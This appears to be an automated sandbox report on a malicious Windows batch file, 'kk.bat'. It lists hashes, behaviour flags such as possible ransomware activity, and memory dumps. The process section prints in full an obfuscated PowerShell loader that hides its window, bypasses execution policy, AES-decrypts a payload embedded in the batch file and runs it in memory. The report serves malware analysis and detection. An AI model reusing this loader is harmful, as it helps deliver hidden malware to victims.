Analysis
-
max time kernel
387s -
max time network
397s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
-
submitted
09-02-2023 14:38
General
-
Target
kk.bat
-
Size
182KB
-
MD5
df4da1ecd4c50871a1c4315f571e4402
-
SHA1
1dbbe9b3784cf5ecdd08b27132a7e31588954865
-
SHA256
9800bef9d4936ee96d4872fb686121dd7209f8b529e9bdc833c4fe54bb68f5c8
-
SHA512
5f9e47f865c48cb1f2070d5d393a5d3494074bfe2347e07c988d06c8244dd420181c210a8ebdd54f768a64a5906d0c9e3be271d44f6e5bd32991bc2cacf85d3e
-
SSDEEP
3072:ur2RTVYk0bjRtZLlnm6Gdk8vZQfjO8KifQ6vfegRI8mlgJJ4u6A0FzfghYE:BRiltZITy8ufjLQsBUlgeMYE
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
-
Loads dropped DLL 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\kk.bat"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\kk.bat.exe"kk.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $flLnL = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\kk.bat').Split([Environment]::NewLine);foreach ($jhglm in $flLnL) { if ($jhglm.StartsWith(':: ')) { $uDeAm = $jhglm.Substring(3); break; }; };$dLIJD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($uDeAm);$nJkwh = New-Object System.Security.Cryptography.AesManaged;$nJkwh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$nJkwh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$nJkwh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('I5NM1YScgS/1//5R8gmm/tnI3DRCjxBbFnAG0xn8rTc=');$nJkwh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mehcJXqMnXZUmnmrBD1Eeg==');$bIbyd = $nJkwh.CreateDecryptor();$dLIJD = $bIbyd.TransformFinalBlock($dLIJD, 0, $dLIJD.Length);$bIbyd.Dispose();$nJkwh.Dispose();$gJfcg = New-Object System.IO.MemoryStream(, $dLIJD);$dkGYN = New-Object System.IO.MemoryStream;$yfRSU = New-Object System.IO.Compression.GZipStream($gJfcg, [IO.Compression.CompressionMode]::Decompress);$yfRSU.CopyTo($dkGYN);$yfRSU.Dispose();$gJfcg.Dispose();$dkGYN.Dispose();$dLIJD = $dkGYN.ToArray();$qMhaY = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($dLIJD);$haTMg = $qMhaY.EntryPoint;$haTMg.Invoke($null, (, [string[]] ('')))2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\kk.bat.exeFilesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
\Users\Admin\AppData\Local\Temp\kk.bat.exeFilesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
memory/968-55-0x0000000000000000-mapping.dmp
-
memory/968-57-0x000007FEFBD91000-0x000007FEFBD93000-memory.dmpFilesize
8KB
-
memory/968-58-0x000007FEF3900000-0x000007FEF4323000-memory.dmpFilesize
10.1MB
-
memory/968-60-0x00000000022E4000-0x00000000022E7000-memory.dmpFilesize
12KB
-
memory/968-59-0x000007FEF2DA0000-0x000007FEF38FD000-memory.dmpFilesize
11.4MB
-
memory/968-61-0x00000000022EB000-0x000000000230A000-memory.dmpFilesize
124KB
-
memory/968-62-0x00000000022E4000-0x00000000022E7000-memory.dmpFilesize
12KB
-
memory/968-63-0x00000000022EB000-0x000000000230A000-memory.dmpFilesize
124KB